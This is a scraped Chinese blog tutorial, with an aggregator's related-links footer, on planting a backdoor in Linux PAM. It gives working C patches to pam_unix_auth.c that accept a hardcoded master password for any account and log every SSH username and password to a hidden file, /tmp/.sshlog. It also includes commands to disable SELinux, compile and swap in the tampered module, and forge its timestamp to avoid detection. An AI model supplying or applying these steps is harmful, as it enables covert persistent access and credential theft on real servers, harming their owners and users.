Linux PAM后门:窃取ssh密码及自定义密码登录
source link: https://y4er.com/post/linux-backdoor-pam/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
PAM是Linux默认的ssh认证登录机制,因为他是开源的,我们可以修改源码实现自定义认证逻辑,达到记录密码、自定义密码登录、dns带外等功能。
- CentOS Linux release 7.8.2003 (Core)
- pam-1.1.8-23.el7.x86_64
centos需要关闭selinux,临时关闭setenforce 0。永久关闭需要修改/etc/selinux/config,将其中SELINUX设置为disabled。
自定义ssh密码
查看PAM版本rpm -qa|grep pam
下载对应源码:http://www.linux-pam.org/library/
wget http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz
tar zxvf Linux-PAM-1.1.8.tar.gz
安装gcc编译器和flex库
yum install gcc flex flex-devel -y
修改Linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.c源码实现自定义密码认证
/* verify the password of this user */
retval = _unix_verify_password(pamh, name, p, ctrl);
if(strcmp("fuckyou",p)==0){return PAM_SUCCESS;}
name = p = NULL;
编译生成so文件
cd Linux-PAM-1.1.8
./configure --prefix=/user --exec-prefix=/usr --localstatedir=/var --sysconfdir=/etc --disable-selinux --with-libiconv-prefix=/usr
make
生成的恶意认证so路径在./modules/pam_unix/.libs/pam_unix.so。用它来替换系统自带的pam_unix.so。
因为系统不同位数不同,pam_unix.so的路径也不一样,尽量用find找一下。
然后替换,注意先备份,万一恶意的so文件不可用就GG了。
cp /usr/lib64/security/pam_unix.so /tmp/pam_unix.so.bak
cp /root/Linux-PAM-1.1.8/modules/pam_unix/.libs/pam_unix.so /usr/lib64/security/pam_unix.so
此时先别急着断开ssh,先试一下能不能用我们设置的fuckyou密码登录。
成功登录,后门也就留好了。为了隐蔽,修改下pam_unix.so的时间戳。
touch pam_unix.so -r pam_umask.so
同样编辑modules/pam_unix/pam_unix_auth.c文件
if(retval == PAM_SUCCESS){
FILE * fp;
fp = fopen("/tmp/.sshlog", "a");
fprintf(fp, "%s : %s\n", name, p);
fclose(fp);
}
ssh密码会被记录到/tmp/.sshlog中。编译并替换so
cd Linux-PAM-1.1.8
make clean && make
cp /root/Linux-PAM-1.1.8/modules/pam_unix/.libs/pam_unix.so /usr/lib64/security/pam_unix.so
此时登录ssh会记录密码
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。
Recommend
-
12
Linux PAM&&PAM后门 我是壮丁 ·
-
56
-
13
AgentTesla 是一个基于 .NET 的信息窃密恶意软件,能够从失陷主机的不同应用程序(浏览器、FTP 客户端和下载工具等)中窃取数据。该恶意软件的维护者不断添加新的模块为 AgentTesla 升级维护,最新添加的模块是为了窃取 WiFi 配置文件。
-
7
AutoHotkey 是一款免费的、Windows平台下开放源代码的热键脚本语言。 研究人员发现黑客正在传播一种用AutoHotkey (AHK)脚本语言...
-
4
频繁登录Linux服务器时,使用ssh <username>@<host>的方式登录,但是每次都需要输入密码是件很麻烦的事。我们还可以使用私钥/公钥对的方式在免密码登录服务器。首先需要在远程服务器中安装ssh-server服务,才可以...
-
8
攻击者部署后门,窃取Exchange电子邮件-51CTO.COM 攻击者部署后门,窃取Exchange电子邮件 作者:wzb123 2022-05-05 16:24:21
-
9
微软Exchange被爆高危后门 可用于窃取凭证等-51CTO.COM 微软Exchange被爆高危后门 可用于窃取凭证等 2022-07-02 15:23:59 日前,卡巴斯基的安全团队发布了一份令人担忧的报告。报告...
-
3
增粉利器?实则是窃取登录凭据的恶意软件-51CTO.COM 增粉利器?实则是窃取登录凭据的恶意软件 作者:Avenger 2022-07-18 05:56:21
-
7
黑客利用伪造的弹出登录窗口窃取Steam帐户 作者:Zicheng 2022-09-13 11:15:40 由 Group-IB发布的关于此类攻击的研究报告中说明了BITB攻击针对Steam用户的钓鱼过程,并出售这些账户的访问权限。这些目标账户通常价...
-
4
V2EX › Linux 新版 Linux QQ 支持非内测用户密码登录了
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK